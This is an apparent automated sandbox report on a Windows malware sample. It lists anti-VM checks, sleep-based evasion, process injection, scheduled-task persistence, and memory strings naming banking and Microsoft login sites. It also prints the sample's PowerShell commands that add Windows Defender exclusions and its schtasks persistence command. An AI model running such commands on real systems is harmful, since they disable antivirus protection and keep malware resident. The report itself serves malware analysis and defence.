                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: l2rMtmFkD6.exe PID: 6156, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ECcZgk.exe PID: 1848, type: MEMORYSTR
                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeMemory allocated: CB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeMemory allocated: 29A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeMemory allocated: 49A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeMemory allocated: 6130000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeMemory allocated: 7130000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeMemory allocated: 7280000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeMemory allocated: 8280000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeMemory allocated: 14D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeMemory allocated: 2FF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeMemory allocated: 4FF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeMemory allocated: 2530000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeMemory allocated: 2710000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeMemory allocated: 4710000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeMemory allocated: 5ED0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeMemory allocated: 6ED0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeMemory allocated: 7020000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeMemory allocated: 8020000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeMemory allocated: 2FC0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeMemory allocated: 3220000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeMemory allocated: 3020000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5321Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 356Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5415Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 520Jump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeWindow / User API: threadDelayed 3103Jump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeWindow / User API: threadDelayed 3330Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeWindow / User API: threadDelayed 1252
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeWindow / User API: threadDelayed 7809
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exe TID: 6404Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4672Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7100Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5356Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exe TID: 3680Thread sleep time: -23980767295822402s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exe TID: 4460Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exe TID: 768Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exe TID: 5736Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exe TID: 6404Thread sleep time: -26747778906878833s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exe TID: 2804Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exe TID: 2276Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeThread delayed: delay time: 922337203685477
                    Source: tmp4AF1.tmp.14.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: tmp4AF1.tmp.14.drBinary or memory string: discord.comVMware20,11696428655f
                    Source: tmp4AF1.tmp.14.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: tmp4AF1.tmp.14.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                    Source: tmp4AF1.tmp.14.drBinary or memory string: global block list test formVMware20,11696428655
                    Source: tmp4AF1.tmp.14.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                    Source: tmp4AF1.tmp.14.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                    Source: tmp4AF1.tmp.14.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                    Source: tmp4AF1.tmp.14.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                    Source: tmp4AF1.tmp.14.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                    Source: l2rMtmFkD6.exe, 00000000.00000002.2103869192.0000000005F90000.00000004.08000000.00040000.00000000.sdmp, l2rMtmFkD6.exe, 00000000.00000002.2100406003.0000000003A68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: fcQyhGFSIO
                    Source: tmp4AF1.tmp.14.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                    Source: tmp4AF1.tmp.14.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                    Source: tmp4AF1.tmp.14.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                    Source: tmp4AF1.tmp.14.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                    Source: tmp4AF1.tmp.14.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                    Source: tmp4AF1.tmp.14.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                    Source: tmp4AF1.tmp.14.drBinary or memory string: outlook.office.comVMware20,11696428655s
                    Source: l2rMtmFkD6.exe, 00000008.00000002.2206765111.000000000158C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlloo
                    Source: tmp4AF1.tmp.14.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                    Source: tmp4AF1.tmp.14.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                    Source: tmp4AF1.tmp.14.drBinary or memory string: AMC password management pageVMware20,11696428655
                    Source: tmp4AF1.tmp.14.drBinary or memory string: tasks.office.comVMware20,11696428655o
                    Source: tmp4AF1.tmp.14.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                    Source: tmp4AF1.tmp.14.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                    Source: tmp4AF1.tmp.14.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: tmp4AF1.tmp.14.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                    Source: tmp4AF1.tmp.14.drBinary or memory string: dev.azure.comVMware20,11696428655j
                    Source: ECcZgk.exe, 0000000E.00000002.2312148295.00000000013F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllRR&
                    Source: tmp4AF1.tmp.14.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                    Source: ECcZgk.exe, 0000000B.00000002.2196284895.0000000005030000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}A
                    Source: tmp4AF1.tmp.14.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                    Source: tmp4AF1.tmp.14.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                    Source: tmp4AF1.tmp.14.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                    Source: tmp4AF1.tmp.14.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\l2rMtmFkD6.exe"
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ECcZgk.exe"
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\l2rMtmFkD6.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ECcZgk.exe"Jump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeMemory written: C:\Users\user\Desktop\l2rMtmFkD6.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeMemory written: C:\Users\user\AppData\Roaming\ECcZgk.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\l2rMtmFkD6.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ECcZgk.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECcZgk" /XML "C:\Users\user\AppData\Local\Temp\tmp5831.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess created: C:\Users\user\Desktop\l2rMtmFkD6.exe "C:\Users\user\Desktop\l2rMtmFkD6.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECcZgk" /XML "C:\Users\user\AppData\Local\Temp\tmp7D1E.tmp"
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess created: C:\Users\user\AppData\Roaming\ECcZgk.exe "C:\Users\user\AppData\Roaming\ECcZgk.exe"
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeQueries volume information: C:\Users\user\Desktop\l2rMtmFkD6.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
